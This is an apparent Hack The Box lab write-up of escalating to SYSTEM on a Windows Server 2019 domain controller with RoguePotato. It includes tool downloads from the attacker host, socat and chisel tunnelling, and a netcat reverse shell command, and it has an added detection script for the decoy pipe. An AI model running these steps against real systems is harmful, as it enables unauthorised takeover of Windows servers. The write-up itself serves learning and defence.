Rogue Potato
The sqlsvc user has both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege set. This makes the target system vulnerable to the Potato family of exploits. I would usually use JuicyPotato for token impersonation, but it does not work from Windows 10 1809 and Windows Server 2019 onward. The target system is Windows Server 2019, so I will be using an alternative: RoguePotato.
- RoguePotato instructs the DCOM server to perform a remote OXID query by specifying a remote IP (the attacker's IP).
- On the remote IP, set up a "socat" listener that redirects the OXID resolution requests to a fake OXID RPC server.
- The fake OXID RPC server implements the ResolveOxid2 server procedure, which points to a named pipe under our control: ncacn_np:localhost/pipe/roguepotato[\pipe\epmapper]
- The DCOM server connects to the RPC server in order to perform the IRemUnknown2 interface call. By connecting to the named pipe, an "Authentication Callback" is performed, and we can impersonate the caller via an RpcImpersonateClient() call.
- Then a token stealer will:
  - Get the PID of the rpcss service
  - Open the process, list all handles, and for each handle try to duplicate it and get the handle type
  - If the handle type is "Token" and the token owner is SYSTEM, try to impersonate it and launch a process with CreateProcessAsUser() or CreateProcessWithToken()
What do you need to make it work?
- You need a machine under your control where you can perform the redirect, and this machine must be reachable on port 135 by the victim.
- Upload both exe files from the PoC. It is also possible to launch the fake OXID resolver in standalone mode on a Windows machine under our control when the victim's firewall won't accept incoming connections. More info: https://0xdf.gitlab.io/2020/09/08/roguepotato-on-remote.html
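A defender-side counterpart to the mechanism above, added here as an example that is not part of the original write-up or the RoguePotato project: it triages constructed Sysmon-style events for the two artefacts the technique leaves behind, a named pipe that ends in \pipe\epmapper but is not the real \epmapper endpoint-mapper pipe, and a host-initiated TCP/135 (OXID resolution) connection to an address outside the site's own ranges. The event field names and the internal range 10.10.10.0/23 are assumptions.

```python
import ipaddress

# Constructed Sysmon-style events (not captured from the target). Shapes follow
# Sysmon event IDs 3 (network connection), 17 (pipe created), 18 (pipe connected).
SAMPLE_EVENTS = [
    {"EventID": 17, "Image": "C:\\Temp\\RoguePotato.exe",
     "PipeName": "\\RoguePotato\\pipe\\epmapper"},
    {"EventID": 18, "Image": "C:\\Windows\\System32\\svchost.exe",
     "PipeName": "\\epmapper"},
    {"EventID": 3, "Image": "C:\\Windows\\System32\\svchost.exe", "Initiated": "true",
     "DestinationIp": "10.10.14.9", "DestinationPort": 135},
    {"EventID": 3, "Image": "C:\\Windows\\System32\\lsass.exe", "Initiated": "true",
     "DestinationIp": "10.10.11.10", "DestinationPort": 135},
]

# Ranges the server legitimately talks RPC to (assumed; the target's own subnet
# is 10.10.10.0/23 according to its ipconfig output).
INTERNAL_NETS = [ipaddress.ip_network("10.10.10.0/23")]

REAL_EPMAPPER = "\\epmapper"  # the genuine endpoint-mapper pipe name


def is_rogue_epmapper_pipe(pipe_name):
    """True for a pipe ending in \\epmapper that is not \\epmapper itself, e.g.
    \\RoguePotato\\pipe\\epmapper, the decoy the ResolveOxid2 binding points at."""
    name = pipe_name.lower()
    return name.endswith(REAL_EPMAPPER) and name != REAL_EPMAPPER


def is_external_oxid_resolution(event, internal_nets=INTERNAL_NETS):
    """True for a host-initiated TCP/135 connection leaving the internal ranges:
    RPCSS resolving an OXID against a resolver it should never reach."""
    if event.get("EventID") != 3 or event.get("Initiated") != "true":
        return False
    if int(event.get("DestinationPort", 0)) != 135:
        return False
    dst = ipaddress.ip_address(event["DestinationIp"])
    return not any(dst in net for net in internal_nets)


def triage(events, internal_nets=INTERNAL_NETS):
    """Return one alert line per matching event, in input order."""
    alerts = []
    for ev in events:
        if ev.get("EventID") in (17, 18) and is_rogue_epmapper_pipe(ev.get("PipeName", "")):
            alerts.append(f"rogue epmapper pipe {ev['PipeName']} opened by {ev['Image']}")
        elif is_external_oxid_resolution(ev, internal_nets):
            alerts.append(f"outbound OXID resolution to {ev['DestinationIp']} by {ev['Image']}")
    return alerts
```

Running triage(SAMPLE_EVENTS) yields two alerts, the decoy pipe from RoguePotato.exe and the connection to 10.10.14.9:135, while the real \epmapper pipe and the in-site port 135 connection are left alone.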
Exploit
Exploit found online from a GitHub repository
PS C:\Temp> iwr http://10.10.14.9/RoguePotato.exe -outfile C:\Temp\RoguePotato.exe
PS C:\Temp> iwr http://10.10.14.9/GetCLSID.ps1 -outfile C:\Temp\GetCLSID.ps1
Delivery Complete
Initial Fail
PS C:\Temp> .\GetCLSID.ps1
.\GetCLSID.ps1
Name Used (GB) Free (GB) Provider Root CurrentLocation
---- --------- --------- -------- ---- ---------------
HKCR Registry HKEY_CLASSES_ROOT
Looking for CLSIDs
Looking for APIDs
Joining CLSIDs and APIDs
PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Temp\Windows_Server_2019_Standard
PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Temp
PSChildName : Windows_Server_2019_Standard
PSDrive : C
PSProvider : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : True
Name : Windows_Server_2019_Standard
FullName : C:\Temp\Windows_Server_2019_Standard
Parent : Temp
Exists : True
Root : C:\
Extension :
CreationTime : 08/03/2023 18:17:09
CreationTimeUtc : 08/03/2023 18:17:09
LastAccessTime : 08/03/2023 18:17:09
LastAccessTimeUtc : 08/03/2023 18:17:09
LastWriteTime : 08/03/2023 18:17:09
LastWriteTimeUtc : 08/03/2023 18:17:09
Attributes : Directory
Mode : d-----
BaseName : Windows_Server_2019_Standard
Target : {}
LinkType :
Executing the GetCLSID.ps1 PowerShell script to extract all the CLSIDs present on the target system.
PS C:\Temp> cd Windows_Server_2019_Standard ; cat CLSID.list
While all of the CLSIDs in CLSID.list are present on the system, not all of them run with SYSTEM privileges. If the default CLSID built into RoguePotato.exe fails, I would need to try them one by one.
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/potato]
└─$ socat -v tcp-listen:135,reuseaddr,fork tcp:10.10.11.168:5555
Starting a network redirector on Kali. Anything coming in on Kali's TCP port 135 is forwarded to the target's TCP port 5555, where RoguePotato.exe will be listening for the OXID resolver request coming back from Kali so the exploit can resolve it locally.
c:\Temp> C:\Temp\RoguePotato.exe -r 10.10.14.9 -e "C:\temp\nc64.exe 10.10.14.9 1234 -e cmd" -l 5555
[+] Starting RoguePotato...
[*] Creating Rogue OXID resolver thread
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[*] Listening on pipe \\.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[*] Calling CoGetInstanceFromIStorage with CLSID:{4991d34b-80a1-4291-83b6-3328366b9097}
[*] Starting RogueOxidResolver RPC Server listening on port 5555 ...
[*] IStoragetrigger written:102 bytes
[-] Named pipe didn't received any connect request. Exiting ...
The initial attempt with RoguePotato.exe fails. It looks like the network redirector on Kali received the traffic but failed to deliver it back to the target's TCP port 5555, as the connection timed out. Checking the network traffic with Wireshark reveals that RoguePotato.exe never received anything on port 5555, although the network redirector on Kali made three TCP retransmission attempts. This is most likely the firewall blocking the incoming connection. I saw earlier that the firewall is enabled and active. This is why RoguePotato.exe failed: the firewall was blocking the incoming traffic (the forwarded OXID resolver request) on the target port 5555. Working around this requires tunneling, and I will be using chisel for that.
Tunneling
PS C:\Temp> iwr http://10.10.14.9/chiselx64.exe -outfile C:\Temp\chiselx64.exe
Delivery complete
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/potato]
└─$ chisel server -p 55555 --reverse -v
2023/03/08 19:32:07 server: Reverse tunnelling enabled
2023/03/08 19:32:07 server: Fingerprint dTb1NbbGSm09Szd7Q9hoCLNcmEBgV1xMRpkWop8DwU0=
2023/03/08 19:32:07 server: Listening on http://0.0.0.0:55555
Running a chisel server on Kali port 55555 with reverse tunnelling enabled.
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/potato]
└─$ socat -v tcp-listen:135,reuseaddr,fork tcp:10.10.14.9:5555
This network forwarder will receive the OXID resolver request that RoguePotato.exe sends to Kali's port 135 and forward it to tcp:10.10.14.9:5555. Note that 10.10.14.9 is Kali's virtual interface connected to the target network.
C:\Temp> C:\Temp\chiselx64.exe client 10.10.14.9:55555 R:10.10.14.9:5555:127.0.0.1:5555
2023/03/08 18:35:51 client: Connecting to ws://10.10.14.9:55555
2023/03/08 18:35:51 client: Connected (Latency 32.5296ms)
In a new session, I now tunnel Kali's socket, 10.10.14.9:5555, to the target's socket, 127.0.0.1:5555. The OXID resolver request is passed back through the tunnel to RoguePotato.exe, which is listening on port 5555. Overall the setup looks like this (diagram not shown), except that the port is 5555, not 9999.
Exploitation
PS C:\Temp> C:\Temp\RoguePotato.exe -r 10.10.14.9 -e "C:\temp\nc64.exe 10.10.14.9 1234 -e cmd" -l 5555
[+] Starting RoguePotato...
[*] Creating Rogue OXID resolver thread
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[*] Listening on pipe \\.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[*] Calling CoGetInstanceFromIStorage with CLSID:{4991d34b-80a1-4291-83b6-3328366b9097}
[*] Starting RogueOxidResolver RPC Server listening on port 5555 ...
[*] IStoragetrigger written:102 bytes
[*] SecurityCallback RPC call
[*] ServerAlive2 RPC Call
[*] SecurityCallback RPC call
[*] ResolveOxid2 RPC call, this is for us!
[*] ResolveOxid2: returned endpoint binding information = ncacn_np:localhost/pipe/RoguePotato[\pipe\epmapper]
[*] Client connected!
[+] Got SYSTEM Token!!!
[*] Token has SE_ASSIGN_PRIMARY_NAME, using CreateProcessAsUser() for launching: C:\temp\nc64.exe 10.10.14.9 1234 -e cmd
[+] RoguePotato gave you the SYSTEM powerz :D
RoguePotato.exe received the OXID resolver request from the Kali network forwarder and completed the exploit: the stolen SYSTEM token was used to launch nc64.exe, which triggered the reverse shell.
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/potato]
└─$ socat -v tcp-listen:135,reuseaddr,fork tcp:10.10.14.9:5555
With the -v flag, I can also see the verbose traffic passing through the socat network forwarder: it forwarded the OXID resolver request to Kali's socket, 10.10.14.9:5555, which is tunneled to the target socket, 127.0.0.1:5555, where RoguePotato.exe was listening. The UTF-16 strings in the exchange include the returned binding localhost/pipe/RoguePotato[\pipe\epmapper] and the account name NT AUTHORITY\NETWORK SERVICE, the account RPCSS runs under.
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/potato]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.168] 54608
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\Temp> whoami
whoami
nt authority\system
c:\Temp> hostname
hostname
DC1
c:\Temp> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::181
IPv6 Address. . . . . . . . . . . : dead:beef::8516:7ac6:78b:c7b
Link-local IPv6 Address . . . . . : fe80::8516:7ac6:78b:c7b%14
IPv4 Address. . . . . . . . . . . : 10.10.11.168
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%14
                                    10.10.10.2
System Level Compromise